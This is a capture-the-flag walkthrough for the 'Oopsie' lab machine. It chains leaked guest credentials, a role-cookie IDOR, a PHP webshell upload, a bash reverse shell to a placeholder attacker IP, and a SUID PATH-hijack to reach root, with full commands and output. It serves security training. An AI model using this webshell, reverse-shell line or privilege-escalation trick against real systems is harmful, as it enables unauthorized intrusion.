⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Oopsie chains several web vulnerabilities into a full system compromise. The attack path starts with guest login credentials hidden in page source, escalates via an Insecure Direct Object Reference (IDOR) to hijack the super-admin account, abuses an unrestricted file upload to plant a PHP webshell, catches a reverse shell, and then escalates privileges via a SUID binary. This is one of the most instructive chains in the Starting Point series.

Tools: nmap · burpsuite · netcat · find  ·  Difficulty: Easy  ·  OS: Linux
01 — What You Will Learn
SkillWhy it matters
Source code analysis for hidden credentialsDeveloper-left comments and JS files frequently contain credentials and endpoint hints
IDOR (Insecure Direct Object Reference)Manipulating account IDs in requests to access other users' data — OWASP A01
Unrestricted file upload exploitationUploading PHP when only images are expected — bypassing weak client-side validation
SUID privilege escalationFinding binaries that run as root regardless of who executes them
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 80/tcp open http Apache httpd 2.4.29

Browse to port 80 — a car rental web application. Check the page source for any interesting comments or JS file references before running any tools.

03 — Hidden Credentials in Source

Inspecting the HTML source reveals a reference to a login page. Browsing to it and inspecting the JavaScript source file exposes guest credentials embedded in the code.

Credentials found in JS source
// guest login var user = "guest"; var pass = "guest";
Login endpoint
http://10.129.x.x/cdn-cgi/login/

Log in with guest / guest. The application grants limited access. You can browse as a guest but cannot access the upload functionality — that requires a super-admin account.

04 — IDOR to Super-Admin Access

After logging in, notice the URL and cookies include an account ID and role value. Intercept a request in Burp and examine the cookie:

Cookie values after guest login
Cookie: user=2233; role=guest

The user value is a numeric ID and role is controlled client-side. Browse to the Account page — the URL exposes the guest user ID. The application also has an accounts listing page accessible to guests that shows other user IDs.

Browsing to /cdn-cgi/login/admin.php?content=accounts&id=1
ID: 1 Name: admin Email: admin@megacorp.com Access ID: 34322
Modify the cookie in Burp to impersonate the admin
Cookie: user=34322; role=admin

Refresh. You now have admin-level access including the Uploads section.

ℹ  This is a classic IDOR — the application trusts a user-controlled value (the cookie) to determine privilege level instead of validating server-side. Changing role=guest to role=admin is all it takes.
05 — Webshell Upload

Navigate to the Uploads section. The form accepts files — the server-side validation only checks the file extension loosely. Upload a PHP webshell.

Webshell file content (shell.php)
<?php system($_GET['cmd']); ?>
Gobuster to find the upload directory
gobuster dir -u http://10.129.x.x -w /usr/share/seclists/Discovery/Web-Content/common.txt
/uploads (Status: 301)
Test command execution
curl http://10.129.x.x/uploads/shell.php?cmd=id # uid=33(www-data) gid=33(www-data)
✓ RCE confirmed as www-data.
06 — Reverse Shell
Start listener
nc -lvnp 4444
Trigger reverse shell via the webshell
curl "http://10.129.x.x/uploads/shell.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/YOUR_IP/4444+0>%261'"
Upgrade to a stable TTY
python3 -c 'import pty; pty.spawn("/bin/bash")' Ctrl+Z stty raw -echo; fg export TERM=xterm
07 — Privilege Escalation via SUID

Look for SUID binaries — executables that run with the file owner's privileges (often root) regardless of who executes them.

Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
Interesting output
/usr/bin/bugtracker
Run the binary to understand its behaviour
bugtracker ------------------ : EV Bug Tracker : ------------------ Enter bug ID: 1 cat: /root/reports/1: No such file or directory

What you're seeing: the binary calls cat with a user-controlled path — but it calls cat without an absolute path. This means you can hijack it by creating a malicious cat binary earlier in PATH.

PATH hijack to get a root shell
cd /tmp echo '/bin/sh' > cat chmod +x cat export PATH=/tmp:$PATH bugtracker
# id uid=0(root) gid=0(root) groups=0(root)
✓ Root shell via SUID PATH hijack. Read /root/flag.txt to complete the machine.
08 — Key Takeaways
Oopsie is a masterclass in vulnerability chaining — each step is modest in isolation, but together they go from unauthenticated visitor to root in five moves.
ConceptReal-world relevance
Credentials in JS sourceAlways read page source — JS files, comments, and config endpoints regularly leak credentials
IDOR on role cookieNever trust client-controlled role or ID values — server must validate privilege on every request
Unrestricted file uploadAny upload that accepts PHP on a PHP-enabled server leads to webshell and RCE
SUID + relative pathCustom SUID binaries calling system tools without absolute paths are a reliable privesc vector